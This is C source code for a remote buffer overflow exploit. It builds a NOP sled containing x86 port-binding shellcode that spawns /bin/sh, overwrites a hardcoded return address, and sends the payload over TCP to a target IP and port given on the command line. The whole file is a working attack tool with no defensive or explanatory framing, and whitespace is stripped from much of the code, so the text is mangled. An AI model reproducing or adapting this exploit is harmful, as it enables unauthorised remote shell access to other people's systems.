#include <stdio.h>
#include <netdb.h>
#include <netinet/in.h>
//Portbinding Shellcodecharshellcode[]="\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8""\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89""\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0""\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd""\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9""\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75""\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08""\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";//standard offset (probably must be modified)#define RET 0xbffff5ec
intmain(intargc,char*argv[]){charbuffer[1064];ints,i,size;structsockaddr_inremote;structhostent*host;if(argc!=3){printf("Usage: %s target-ip port\n",argv[0]);return-1;}// filling buffer with NOPsmemset(buffer,0x90,1064);//copying shellcode into buffermemcpy(buffer+1001-sizeof(shellcode),shellcode,sizeof(shellcode));// the previous statement causes a unintential Nullbyte at buffer[1000]buffer[1000]=0x90;// Copying the return address multiple times at the end of the buffer...for(i=1022;i<1059;i+=4){*((int*)&buffer[i])=RET;}buffer[1063]=0x0;//getting hostnamehost=gethostbyname(argv[1]);if(host==NULL){fprintf(stderr,"Unknown Host %s\n",argv[1]);return-1;}// creating socket...s=socket(AF_INET,SOCK_STREAM,0);if(s<0){fprintf(stderr,"Error: Socket\n");return-1;}//state Protocolfamily , then converting the hostname or IP address, and getting port numberremote.sin_family=AF_INET;remote.sin_addr=*((structin_addr*)host->h_addr);remote.sin_port=htons(atoi(argv[2]));// connecting with destination hostif(connect(s,(structsockaddr*)&remote,sizeof(remote))==-1){close(s);fprintf(stderr,"Error: connect\n");return-1;}//sending exploit stringsize=send(s,buffer,sizeof(buffer),0);if(size==-1){close(s);fprintf(stderr,"sending data failed\n");return-1;}// closing socketclose(s);}
